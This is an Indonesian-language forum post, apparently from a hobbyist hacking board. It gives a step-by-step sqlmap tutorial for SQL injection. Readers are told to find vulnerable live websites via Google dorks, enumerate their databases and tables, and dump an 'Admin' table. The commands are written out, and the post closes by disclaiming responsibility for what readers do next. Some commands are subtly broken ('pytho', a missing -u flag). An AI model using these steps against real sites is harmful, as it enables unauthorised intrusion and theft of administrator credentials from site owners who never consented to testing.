SQLi Sqlmap.py

ok kawan-kawan sekalian kali ini w akan berbagi tutorial dengan SQLi menggunakan SQLMAP salah tools pentets yang ada di dalam backtrack...

ok langsung aja dari pada lama2..

yang pertama harus di lakukan adalah nyalain laptop/pc lo yang menggunakan backtrack virtual juga boleh...

hihihiihih 

ok serius nie..

1.buka SQL Map kalian dengan cara 

Code:

Application - Backtrack - Exploitation - Web Exploitation Tools - SqlMAP

2.cari lah target yang sudah kalian temukan celahnya dengan menggunakan google dork...

3.setelah dapet web yang ada celah silakan pentest..

Code:

python sqlmap.py -u http://site.com/catalog.php?id=129 --dbs

-u = url
--dbs = kita mencari nama databasenya...

4.setalah ketemua nama databasenya..

Code:

python sqlmap.py -u http://site.com/catalog.php?id=129 -D gatotganteng --tables

-D = nama database yang sudah kita temukan tadi
--tables = untuk muka isi table..

5.isi tabel udah keluar dan ada hasilnya ternyata ada table admin kita liat columnsnya...

Code:

python sqlmap.py http://site.com -D gatotganteng -T Admin --columns

Code:

pytho sqlmap.py http://site.com -D gatotganteng -T Admin --dump

kalo udah begini silakan dah..

mau kalian apain tapi yang jelas w kgk tanggung jawab ya..


wkwkwkkwkwkkwk

:ngakak:

udah jangan lupa

:kasihcendol:

wkwkkwkwk

salam veronochi

dan w hanya mau berbagi kepada orang-orang yang mau belajar...